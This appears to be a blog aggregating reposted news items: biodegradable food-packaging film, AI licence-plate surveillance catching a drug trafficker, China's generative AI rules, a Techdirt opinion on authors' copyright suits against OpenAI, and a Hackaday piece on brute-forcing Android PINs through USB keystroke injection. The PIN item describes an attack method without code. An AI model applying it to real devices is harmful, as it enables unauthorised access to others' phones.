Limonene has been used before in film for food to enhance conservation thanks to its antioxidant and anti-microbial action, but its performance is impaired by volatility and instability during the packaging manufacturing process, even on a laboratory scale.

[…]

“The films with the poly(limonene) additive outperformed those with limonene, especially in terms of antioxidant activity, which was about twice as potent,” Vieira said. The substance also performed satisfactorily as an ultraviolet radiation blocker and was found to be non-volatile, making it suitable for large-scale production of packaging, where processing conditions are more severe.

The films are not yet available for use by manufacturers, mainly because chitosan-based plastic is not yet produced on a sufficiently large scale to be competitive, but also because the poly(limonene) production process needs to be optimized to improve yield and to be tested during the manufacturing of commercial packaging.

[…]

More information: Sayeny de Ávila Gonçalves et al, Poly(limonene): A novel renewable oligomeric antioxidant and UV-light blocking additive for chitosan-based films, Food Packaging and Shelf Life (2023). DOI: 10.1016/j.fpsl.2023.101085

Source: Research group develops biodegradable film that keeps food fresh for longer

AI System Identified Drug Trafficker by Scanning Driving Patterns

Police in New York recently managed to identify and apprehend a drug trafficker seemingly by magic. The perp in question, David Zayas, was traveling through the small upstate town of Scarsdale when he was pulled over by Westchester County police. When cops searched Zayas’ vehicle they found a large amount of crack cocaine, a gun, and over $34,000 in cash in his vehicle. The arrestee later pleaded guilty to a drug trafficking charge.

How exactly did cops know Zayas fit the bill for drug trafficking?

Forbes reports that authorities used the services of a company called Rekor to analyze traffic patterns regionally and, in the course of that analysis, the program identified Zayas as suspicious.

For years, cops have used license plate reading systems to look out for drivers who might have an expired license or are wanted for prior violations. Now, however, AI integrations seem to be making the tech frighteningly good at identifying other kinds of criminality just by observing driver behavior.

Rekor describes itself as an AI-driven “roadway intelligence” platform and it contracts with police departments and other public agencies all across the country. It also works with private businesses. Using Rekor’s software, New York cops were able to sift through a gigantic database of information culled from regional roadways by its county-wide ALPR [automatic license plate recognition] system. That system—which Forbes says is made up of 480 cameras distributed throughout the region—routinely scans 16 million vehicles a week, capturing identifying data points like a vehicle’s license plate number, make, and model. By recording and reverse-engineering vehicle trajectories as they travel across the state, cops can apparently use software to assess whether particular routes are suspicious or not.

In this case, Rekor helped police to assess the route that Zayas’ car was taking on a multi-year basis. The algorithm—which found that the driver was routinely making trips back and forth between Massachusetts and certain areas of upstate New York—determined that Zayas’ routes were “known to be used by narcotics pushers and [involved]…conspicuously short stays,” Forbes writes. As a result, the program deemed Zayas’s activity consistent with that of a drug trafficker.

Artificial intelligence has been getting a lot of attention in recent months due to the disruptions it’s made to the media and software industries but less attention has been paid to how this new technology will inevitably supercharge existing surveillance systems. If cops can already ID a drug trafficker with the click of a button, just think how good this tech will be in ten years’ time. As regulations evolve, one would hope governments will figure out how to reasonably deploy this technology without leading us right off the cliff into Minority Report territory. I mean, they probably won’t, but a guy can dream, can’t he?

Source: AI System Identified Drug Trafficker by Scanning Driving Patterns

There is no way at all that this could possibly go wrong, right? See the comments in the link.

China sets AI rules – not just risk based (EU AI Act), but also ideological

Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.

Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.

Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.

But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.

Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”

Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.

AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”

As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.

Operators are also required to secure licenses for their Ais under most circumstances.

AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.

Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.

The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.

Source: China sets AI rules that protect IP, people, and The Party • The Register

A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright

You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.

All three cases were filed by Joseph Saveri, a plaintiffs class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers, rather than actually stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. There are a ton of assumptions about how Saveri seems to think copyright law works, which is entirely inconsistent with how it actually works.

The complaints are basically all the same, and what it comes down to is the argument that AI systems were trained on copyright-covered material (duh) and that somehow violates their copyrights.

Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation

But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.

Under this definition, all search engines would be copyright infringing, because effectively they’re doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so to would be scanning internet content for training an LLM. Arguably the latter case is way more transformative.

And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.

But, if you look at the details of these lawsuits, they’re not arguing any actual copying (which, you know, is kind of important for their to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.

For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.

The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.

For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.

BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.

If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.

And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:

As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka Bok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most sources of trainable books most similar in nature and size to OpenAI’s description of Books2.

Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.

This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.

Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.

I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since in copyright legal fee awards are much more common).

That said, if we’ve learned anything at all in the past two plus decades of lawsuits about copyright and the internet, courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.

Source: A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright | Techdirt

Brute Forcing A Mobile’s PIN Over USB With A $3 Board

Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.

Trying the twenty most common PINs doesn’t take long.

The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.

The hardware is not much more than a Digispark board, a small ATtiny85-based board with built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.

Once connected to a mobile device, it performs a form of keystroke injection attack, automatically sending keyboard events to input the most common PINs with a delay between each attempt. Assuming the device accepts, trying all twenty codes takes about six minutes.

Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video, embedded below.

 

Source: Brute Forcing A Mobile’s PIN Over USB With A $3 Board | Hackaday